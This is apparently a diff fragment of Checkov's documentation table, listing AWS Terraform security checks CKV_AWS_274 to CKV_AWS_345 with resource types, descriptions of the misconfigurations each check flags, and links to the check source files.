-| 378 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 379 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 380 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 381 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 382 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) |
-| 383 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) |
-| 384 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) |
-| 385 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
-| 386 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
-| 387 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) |
-| 388 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) |
-| 389 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) |
-| 390 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) |
-| 391 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) |
-| 392 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) |
-| 393 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) |
-| 394 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) |
-| 395 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) |
-| 396 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 397 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 398 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 399 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 400 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) |
-| 401 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 402 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 403 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 404 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 405 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) |
-| 406 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 407 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 408 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 409 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 410 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) |
-| 411 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 412 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 413 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 414 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 415 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) |
-| 416 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 417 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 418 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 419 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 420 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) |
-| 421 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) |
-| 422 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) |
-| 423 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) |
-| 424 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) |
-| 425 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) |
-| 426 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) |
-| 427 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) |
-| 428 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) |
-| 429 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) |
-| 430 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) |
-| 431 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) |
-| 432 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) |
-| 433 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) |
-| 434 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) |
-| 435 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) |
-| 436 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) |
-| 437 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) |
-| 438 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) |
-| 439 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) |
-| 440 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) |
-| 441 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) |
-| 442 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) |
-| 443 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) |
-| 444 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) |
-| 445 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) |
-| 446 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 447 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) |
-| 448 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
-| 449 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) |
-| 450 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) |
-| 451 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) |
-| 452 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) |
-| 453 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) |
-| 454 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) |
-| 455 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) |
-| 456 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) |
-| 457 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) |
-| 458 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) |
-| 459 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
-| 460 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
-| 461 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) |
-| 462 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) |
-| 463 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) |
-| 464 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) |
-| 465 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) |
-| 466 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) |
-| 467 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) |
-| 468 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) |
-| 469 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) |
-| 470 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) |
-| 471 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) |
-| 472 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) |
-| 473 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) |
-| 474 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
-| 475 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) |
-| 476 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) |
-| 477 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | 
[WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 478 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 479 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 480 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 481 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | -| 482 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | -| 483 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | -| 484 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | 
